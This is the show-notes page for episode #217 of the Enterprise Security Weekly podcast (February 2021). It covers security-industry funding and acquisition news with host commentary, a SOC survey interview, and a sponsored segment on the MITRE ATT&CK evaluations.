esw217

Enterprise Security Weekly Episode #217 – February 24, 2021

Subscribe to all of our shows and mailing list by visiting: https://securityweekly.com/subscribe

1. Red Canary, Imperva Sonar, Data Breaches & Share Prices, & TrendMicro XDR – 12:30 PM-01:00 PM

Announcements

  • Do you want to stay in the loop on all things Security Weekly? Visit https://securityweekly.com/subscribe to subscribe on your favorite podcast catcher or our Youtube channel, sign up for our mailing list, join our Discord Server, and follow us on our newest live-streaming platform, Twitch!

  • Our next live webcast will be on April 29th at 11am ET where you will learn how to prepare for modern ransomware attacks! Visit https://securityweekly.com/webcasts to register now! If you missed any of our previously recorded webcasts or technical trainings, they are available for your viewing pleasure at https://securityweekly.com/ondemand

Description

This week in the Enterprise News: LasPass is no longer free, Tenable helps with dynamic assets, Security Scorecard and the Score Planner, Trend Micro XDR, & Imperva launches sonar! Funding announcements from: PerimeterX, SPHERE, Red Canary, 1Kosmos, & Strata Identity! In the Acquisition news: Sailpoint to Acquire Intello, Crowdstrike to Acquire Humio, Palo Alto to acquire Bridgecrew, Kaseya to Acquire Rocket Cyber, & more!

Hosts

AdrianSanabria

Adrian Sanabria

@sawaba

Senior Research Engineer at CyberRisk Alliance

  1. PerimeterX Raises $57M in Growth Capital Funding to Fuel Expansion Into New Geographies and Verticals – This is a series D for PerimeterX and brings total funding to nearly $150m. Like most late-stage funding, this round is all about growing into new markets and onto new continents.
  2. SailPoint Announces Intent to Acquire Intello to Identify, Secure, and Govern Access to SaaS Applications for Today’s Digital Enterprise – At first glance, this looks like a CASB play, but it looks more focused on monitoring SaaS use than doing any kind of enforcement or the man-in-the-middle javascript hacks that CASB tends to be associated with. I guess you’d still categorize it as SaaS, even if it’s entirely API-dependent. The acquisition makes sense for SailPoint, as SaaS management is a nice feature-add on top of SailPoint’s existing SSO/IAM offerings.
  3. SPHERE Secures $10 Million in Series A Funding – A women-founded/owned security startup! We don’t see these nearly often enough. SPHERE appears to be a natural evolution of products like Varonis and Stealthbits. It looks like SPHERE can not only identify privileged access and data governance issues but can enforce policies and take action on infractions. They appear to be particularly focused on cloud-based platforms like Office 365, which is smart – that’s where everyone has moved and… O365 can get really messy!
  4. CrowdStrike to Acquire Humio to Deliver Index-Free XDR – We’ve all heard complaints about Splunk costs and many suspect this $400m deal is about (at least partially) alleviating Crowdstrike customers’ Splunk budget. The acquisition totally makes sense, especially for customers that might only be using Splunk to manage Crowdstrike data. I’d expect that Humio would continue to be able to pull in non-Crowdstrike data, as the promise of correlation will only increase the value of the data overall.
  5. Palo Alto Networks Announces Intent to Acquire Bridgecrew – In show #215, we reported the rumor that this acquisition was going down for a number north of $100m. That reporting appears to be accurate, with the final deal value reported as $156m in cash. It’s an amazing return for a company that had only raised $18.1m to date. The acquisition was announced days before the company’s second anniversary from its founding. Bridgecrew is in the rapidly expanding CSPM (cloud security posture management) space. “Highlight all my cloud config mistakes” is another way of thinking of this space.
  6. Security Operations Firm Red Canary Raises $81M To Grow R&D – This brings Red Canary to a total of $125m in funding and I’m honestly glad to see it. Red Canary is one of the few managed security vendors that I consistently hear positive things about. Managed SOC has exploded in recent years, but in my experience, most MSSPs and MDR firms don’t do a great job with detection (or at least, don’t do any better than companies did before they outsourced the function).
  7. How data breaches affect stock market share prices – Comparitech – Big thanks to Gabe Bassett from the Verizon DBIR team for bringing this one to my attention. We know that companies are rarely destroyed by breaches. The ones that do go out of business following a breach tend to be very small. However, the assumption many have (myself included) that big companies always fully recover from a breach seems to be false. This study shows that, from a stock market perspective, nearly all publicly-traded companies that suffer a public breach do worse in the market when compared to market performance before the breach.
  8. John Scott-Railton on Twitter – This is one of the LastPass hot takes from John Scott-Railton, a senior researcher for Citizen Labs.
  9. Changes to LastPass Free – The LastPass Blog – A lot of folks got ruffled by the recent changes to LastPass’s free tier, which has led to some hot takes on where parent company, LogMeIn, might be headed with its new-ish private equity owners. These owners apparently have a history of backing surveillance tech, which doesn’t sit well with folks trusting LastPass with all their passwords.
  10. 1Kosmos Secures $15 Million in Series A Funding from ForgePoint Capital – Quick note: Forgepoint also contributed to two other funding stories this week: Strata and SPHERE! 1Kosmos appears to be trying to solve the complex, frustrating state of authentication. They have both an enterprise-employee-facing and enterprise-customer-facing product. Looks like they’re leveraging passive methods (certs, device identity) and smartphone biometrics to enable MFA and passwordless use cases. Looks like an evolution of the ubiquitous Duo push method, but uses biometrics instead of tapping “accept”?
PaulAsadoorian

Paul Asadoorian

@securityweekly

Founder at Security Weekly

  1. CircleCI announces privacy enhancements for engineering teams
  2. Nutanix announces additional ransomware protections in its cloud platform
  3. SecurityHQ Response: A mobile app that tracks the status of security incidents at any time
  4. CrowdStrike Delivers Advanced Threat Protection for Cloud and Container Workloads
  5. Kaseya acquires RocketCyber
  6. Tenable Launches Exposure Platform for Risk-Based Vulnerability Management of Dynamic Assets
  7. CrowdStrike Global Threat Report Highlights Key Trends in eCrime and Nation-State Activity
  8. Improve Your SecurityScorecard Security Rating with Score Planner
  9. PerimeterX bags $57M to shield enterprise websites from hackers and bots
  10. Trend Micro launches new XDR Trend Micro Vision One
  11. Imperva launches Sonar for unified enterprise security analytics
  12. Cisco AppDynamics Launches New Research, Revealing Unprecedented Demand for Full-Stack Observability
TylerShields

Tyler Shields

@txs

CMO at JupiterOne

  1. Datadog Signs Definitive Agreement to Acquire Sqreen
  2. The Briefing: Bumble Raises IPO Range, SentinelOne Buys Scalyr, And More

2. 2020 Security Operations Survey – 01:00 PM-01:30 PM

Announcements

  • Do you have a specific guest or topic that you want us to cover on one of the shows? Submit your suggestions for guests by visiting https://securityweekly.com/guests and completing the form! We review suggestions monthly and will reach out to you once reviewed!

Description

The 2020 SOC Survey results are in and the author, Chris Crowley, will discuss the detailed results in the report and how they can help individuals and organizations reduce the drag on our global community due to insecure information systems. Effective security operations rely on monitoring your data and being prepared to defend yourself and your organization. Chris will explain why he believes that the classic SOC will move, over the next few years, to MSSPs and how to be ready when threats are detected.

Download the report: https://soc-survey.com/

Guest(s)

Christopher Crowley

Christopher Crowley – Consultant at Montance LLC

@CCrowMontance

Christopher Crowley has been working in computers since he was fifteen years old. He currently operates a boutique consulting firm focusing on security operations. Montance LLC is a trusted independent Information Security partner providing cybersecurity assessment, and framework development services enabling clients to create a new SOC, or improve existing security operations

Hosts

AdrianSanabria

Adrian Sanabria

@sawaba

Senior Research Engineer at CyberRisk Alliance

PaulAsadoorian

Paul Asadoorian

@securityweekly

Founder at Security Weekly

TylerShields

Tyler Shields

@txs

CMO at JupiterOne

3. Evaluating the MITRE ATT&CK Evaluations in their Third Year – 01:30 PM-02:00 PM

Sponsored By

sponsor
Visit https://securityweekly.com/uptycs for more information!

Announcements

  • If you missed Security Weekly Unlocked, you can now access all of the content on-demand, whether you registered before the live event or not, by visiting https://securityweekly.com/unlocked and clicking either the button to register or the button to login!

Description

The latest MITRE ATT&CK vendor evaluations are due out soon. In advance of the new round, Uptycs’ Ganesh Pai and Amit Malik explore the MITRE ATT&CK framework, its ongoing value for analysts AND future plans to extend ATT&CK to cloud and containers. They’ll also show how organizations are translating endpoint and cloud workload telemetry to most effectively support MITRE ATT&CK detections and investigations in the Uptycs Security Analytics Platform.

This segment is sponsored by Uptycs. Visit https://securityweekly.com/uptycs to learn more about them!

Why ATT&CK represents a good test of detection efficacy for buyers https://d1zq5d3dtjfcoj.cloudfront.net/Using-Results-to-Evaluate-Endpoint-Detection-Products_Booklet.pdf

The upcoming ATT&CK 2020 evaluation for Carbanak and FIN7 https://attackevals.mitre-engenuity.org/carbanak-fin7/

Context-rich detections from Uptycs will keep security analysts sane [Blog Post] https://www.uptycs.com/blog/fast-consolidated-and-context-rich-detections-from-uptycs-will-keep-security-analysts-sane

The new ATT&CK Cloud Matrix https://attack.mitre.org/matrices/enterprise/cloud/

Solution page for Uptycs for EDR [Website] https://www.uptycs.com/solutions/endpoint-detection-and-response

Presenter(s)

Amit Malik

Amit Malik – Principal Researcher at Uptycs

Amit is a Principal Researcher at Uptycs. He has specialization in threat detection, threat intelligence and security architecture. Prior to Uptycs, he has worked with leading cyber security companies like Mcafee, Fireeye and Netskope. He holds multiple patents in the area of threat detection and analysis. He actively contributes in security communities through blogs, trainings and tools.

Ganesh Pai

Ganesh Pai – Founder and CEO at Uptycs

Ganesh Pai is Founder & CEO of Uptycs. He is a Boston-based entrepreneur and technologist (formerly Akamai, Verivue, NetDevices) and has been awarded multiple U.S. patents. Ganesh received a BE degree in electronics and communication engineering from Mangalore University and a MS in computer science from Temple University.

Hosts

AdrianSanabria

Adrian Sanabria

@sawaba

Senior Research Engineer at CyberRisk Alliance

PaulAsadoorian

Paul Asadoorian

@securityweekly

Founder at Security Weekly

TylerShields

Tyler Shields

@txs

CMO at JupiterOne